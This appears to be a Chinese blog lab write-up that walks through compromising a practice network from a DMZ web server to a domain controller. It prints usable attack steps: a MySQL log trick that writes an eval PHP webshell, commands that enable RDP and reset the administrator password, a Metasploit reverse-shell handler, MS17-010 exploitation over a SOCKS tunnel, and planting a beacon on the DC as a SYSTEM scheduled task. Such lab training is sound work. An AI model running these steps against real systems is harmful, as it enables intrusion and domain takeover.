内网渗透(DMZ--->DC)

内网入门靶场练习

一:内网渗透

1、渗透流程

从DZM区域中的WEB Server(win7)进行渗透、DMZ和办公区域(Win2k3)有一定联系、将DMZ中的计算机当作跳板,利用隧道技术连接到内网办公区(Win2k3),然后办公区和CD有一定的联系、这样我们就可以攻入内网拿下
DC

2、网络拓扑图

2-1 设备配置

攻击者:windows11一台 、 kali 一台
DMZ区域:web服务win7一台、Mail服务win7一台
内网区域:内网办公区win2003一台、DC win2008服务器一台
在这里插入图片描述

2-2 网络配置

外网IP段—>NAT----->192.168.64.0
内网IP段—>VM4----->192.168.111.0

二:环境配置

1、域环境配置

windows Server2008配置为CD,将win7-1 、win7-2和win2003加入域中!

2、网络配置

2-1 DMZ区-win7-1

(1)win7作为DMZ区域中的web服务器;需要双网卡(外网可以通过公网IP访问web服务,wi7可以通内网ip与内网进行交互);当然我我为了方便直接将公网配置为了NAT、也可自行设置公网网段

外网IP段--->VM3----->192.168.52.0
内网IP段--->NAT----->(自动分配)

在这里插入图片描述

(2)配置静态IP

在这里插入图片描述

(3)配置公网IP

在这里插入图片描述

2-2 DMZ区-win7-2

(1)和win7-1类似只需要分配内网IP就行

2-3 内网办公区

(1)配置网卡为vm3(内网),配置内网ip 192.168.52.141

2-4 DC配置

(1)配置内网IP 192.168.52.138

2-5 攻击机

(1)由于公网网段设置的是NAT,所以不必配置,如果自己设置了公网网段、那么攻击机kali和windows就需要设置双网卡,设置双网卡的目的就是kali可以和DMZ中web服务的公网IP可以访问。

三:内网渗透

1、web服务器渗透

也就是我们平常看到的网页;首先就是进行信息收集;然后漏洞扫描、漏洞挖掘、漏洞利用、获取权限、权限提升等;最终的目的就是那先win7然后进一步进行内网渗透!

1-1 端口扫描

nmap扫描发现开启了80端口和3306端口(也就是数据库端口)
在这里插入图片描述

访问一下80端口出现php探针网址:php探针就是探测服务器配置的;发现并没有什么可以利用的

在这里插入图片描述

1-2 目录扫描

扫描出了数据库的后台登录网址和beifen.rar 文件;尝试数据库的弱口令爆破

在这里插入图片描述

爆破出了账号和密码 root/root
在这里插入图片描述

1-3 phpmyadmin写shell

写shell条件

绝对路径已知
网站权限为root
secure_priv_file= 为非 NULL 的空值

参考连接:https://blog.youkuaiyun.com/weixin_46365325/article/details/140555451
(4)日志写入shell

general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话

SHOW VARIABLES LIKE 'general%';
set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/l.php';
select '<?php eval($_POST[1]); ?>';

在这里插入图片描述

1-4 webshell连接

在这里插入图片描述

1-4 远控拿下桌面

(1)查看ip :我们成功得到了服务器的内网ip ,此时我们是没有办法访问内网的,需要利用web服务当作跳板渗透内网

在这里插入图片描述

(2)开启3389服务

#开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

#通过net user知道用户未administrator;但是不知道密码,直接修改
net user administrator admin@123  #更改密码
net user administrator /active:yes #激活密码

(3)连接

在这里插入图片描述

2、内网渗透拿下域内主机

拿下web应用服务器也就是DMZ的计算机;接下来就是利用这台主机当作跳板内网渗透拿下域内主机(内网办公主机window2003)
在这里插入图片描述

2-1 内网渗透

(1)域内信息收集以及存活探测;可以知道域名、存活主机以及CD
在这里插入图片描述

2-2 CS、MSF联动后渗透

(1)CS上线MDZ区的web服务器

上传木马
在这里插入图片描述

运行CS上线

在这里插入图片描述
(3)权限共享
将cs拿到的权限共享MSF,msf开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.xxx.xxx
set lport 9999
exploit/run

CS共享权限

在这里插入图片描述
pawn 发送到msf(将win7的shell共享给msf)
在这里插入图片描述

2-3 搭建隧道

(1)CS搭建sockets隧道(当然有很多方法)

在这里插入图片描述
(2)查看隧道信息

在这里插入图片描述

2-4 MSF利用隧道渗透

(1)隧道技术后直接拿下域内主机(域内主机存在永痕之蓝漏洞)

#返回
background
setg Proxies socks4:192.168.xxx.xxx:20808
search ms17_010
use 19
#设置域内主机Ip
set rhosts 192.168.52.141
run 

#payload
set command ipconfig

在这里插入图片描述

3、域环境渗透拿下DC

3-1 信息收集

(1)通过上述的信息收集和存活主机探测:知道域是god.org ,域控的名称为owa,DC的内网IP是192.168.52.138
(2)本地用户和域用户的区别
本地用户就是本地登录、账号和密码存放在本机;域用户就是加入域的用户,账号和密码由DC统一管理和分配
(3)域用户的判断

net time /domain
  • 存在域,当前用户是域用户
  • 存在域,当前用户是本地用户—>回显系统错误
  • 不存在域—>回显找不到DC

3-2 CS上线DC(不出网)

(1)生成一个监听器
在这里插入图片描述

(2)生成木马
在这里插入图片描述

(3)现在出现一个问题,木马怎么上传到DC中呢,我们可以利用CS抓取密码;然后和DC之间建立IPC进程通信

  • 抓取密码
    在这里插入图片描述

  • 建立IPC通信(现在wen服务器和DC已经建立安全信任关系了,直接上传木马)

#建立连接
shell net use \\192.168.52.138\ipc$ "password" /user:god\administrator
#查看连接
shell net use
  • 文件上传

上传到web服务器中,然后利用web服务器上传到到DC中

在这里插入图片描述

  • 上传到DC中,然后创建定时任务
#将木马从win7上传DC
shell copy beacon.exe \\192.168.52.138\c$
#设置计划任务
shell schtasks /create /s 192.168.52.138 /tn test /sc onstart /tr c:\beacon.exe /ru system /f
#运行计划任务test
shell schtasks /run /s 192.168.52.138 /i /tn "test"
#建立连接
connect 192.168.52.138
link 192.168.52.138

3-3 拿下DC

(1)CS成功上线

在这里插入图片描述
(2)查看ip

在这里插入图片描述

3-4 横向移动

(1)就做一个简单演示、当然方法很多;横向移动连接域内主机

在这里插入图片描述
在这里插入图片描述
上线域内主机win 2003(结束!!!)

在这里插入图片描述

四:渗透总结

1、总结

本次内网渗透是很简单的、都是存在漏洞的、在实战中可能拿下DMZ区域都是肯困难的,希望感兴趣的的可以深入学习内网渗透、不借助工具可以拿下DC!!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

巅峰赛2000分以下是巅峰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值